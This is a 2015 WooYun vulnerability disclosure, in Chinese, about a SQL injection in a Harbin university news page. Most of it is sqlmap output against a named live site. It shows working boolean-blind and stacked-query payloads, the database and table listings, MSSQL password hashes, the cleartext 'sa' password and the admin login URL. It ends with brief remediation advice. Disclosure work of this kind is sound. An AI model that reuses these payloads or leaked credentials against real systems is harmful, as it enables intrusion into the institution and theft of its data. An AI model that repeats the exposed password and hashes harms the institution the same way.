当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0109981

漏洞标题:哈尔滨某大学boolean-based blind SQL注入

相关厂商:哈尔滨某大学

漏洞作者: 蜗牛的贝壳

提交时间:2015-05-04 18:00

修复时间:2015-05-09 18:00

公开时间:2015-05-09 18:00

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-04: 细节已通知厂商并且等待厂商处理中
2015-05-09: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

由于存在SQL注入漏洞可导致信息泄漏,并且当前连接数据库的用户是sa,密码是sa1234,后台登录网址为:http://kjxy.hrbcu.edu.cn/admin/M_UserLogin.aspx

详细说明:

注入点:http://kjxy.hrbcu.edu.cn/NewsListaspx.aspx?from=top&level=top&type=txt&Cid=5 没有对参数Cid进行严格过滤,导致存在SQL注入,可以爆多个数据库以及泄漏敏感信息。

漏洞证明:

sqlmap identified the following injection points with a total of 152 HTTP(s) requests:
---
Parameter: Cid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: from=top&level=top&type=txt&Cid=5 AND 3665=3665
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: from=top&level=top&type=txt&Cid=5;WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
available databases [8]:
[*] KJXY
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] SysSchool
[*] tempdb
[*] ##MS_PolicyEventProcessingLogin## [1]:
password hash: 0x01005daebcd6079a453cc201c8f5fe6569f09020a1e8ef5d8fe9
header: 0x0100
salt: 5daebcd6
mixedcase: 079a453cc201c8f5fe6569f09020a1e8ef5d8fe9
[*] ##MS_PolicyTsqlExecutionLogin## [1]:
password hash: 0x0100c2cad526792072ae105d5337c04b1296fd9b2bd728367ea3
header: 0x0100
salt: c2cad526
mixedcase: 792072ae105d5337c04b1296fd9b2bd728367ea3
[*] sa [1]:
password hash: 0x0100b05eda5d9bb0d02ac98088d75d4734f7154ff81fbcd4fa00
header: 0x0100
salt: b05eda5d
mixedcase: 9bb0d02ac98088d75d4734f7154ff81fbcd4fa00
clear-text password: sa1234
Database: SysSchool
[49 tables]
+-------------------+
| ActiveProject |
| AdminMenu |
| Class |
| Cmessage |
| Company |
| D99_CMD |
| D99_Tmp |
| EmailAttachment |
| FeildItem |
| GovConsist |
| Links |
| NWEmailAttachment |
| NewsCategory |
| PicNews |
| PicType |
| RoleCategory |
| StINFO |
| Staff |
| SysEmailBox |
| SysLog |
| SysNWEmailBox |
| SysProvince |
| SysRole |
| SysTeacherJCXXB |
| SysTeacherJXXXB |
| SysTeacherKYXXB |
| SysTeacherRCXXB |
| SysTeachersInfo |
| SystemMenu |
| TextNews |
| UserFiles |
| UserInfo |
| Users |
| View_AllNewsInfo |
| View_CPNR |
| View_CPTitle |
| View_UserInfo |
| WebStiestyle |
| ZIPCODE |
| adminUser |
| sysCPXXSET |
| sysDictionary |
| sysEmailConfig |
| sysInfoNews |
| sysPCXXB |
| sysStudentsInfo |
| sysXXLX |
| sysdiagrams |
| zidian |
+-------------------+
Database: KJXY
[24 tables]
+------------------+
| Admin |
| AdminMenu |
| Admin_forum |
| Article_E |
| Article_NoCheck |
| Board |
| Class |
| Config |
| NClass |
| NotDown |
| Remark |
| Remark_comments |
| Special |
| T_GJXX |
| Template_List |
| article_comments |
| downloadclass |
| downloads |
| photoclass |
| photos |
| pictures |
| settings |
| templates |
| usertype |
+------------------+
等等。。。由于网速不太给力就没深入下去了

修复方案:

过滤好参数,网站后台登录地址改下吧,太容易找到了,sa的密码太简单了,改复杂点吧,还有这个权限也很大了,比较危险。。。

版权声明:转载请注明来源 蜗牛的贝壳@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-05-09 18:00

厂商回复:

漏洞Rank:2 (WooYun评价)

最新状态:

暂无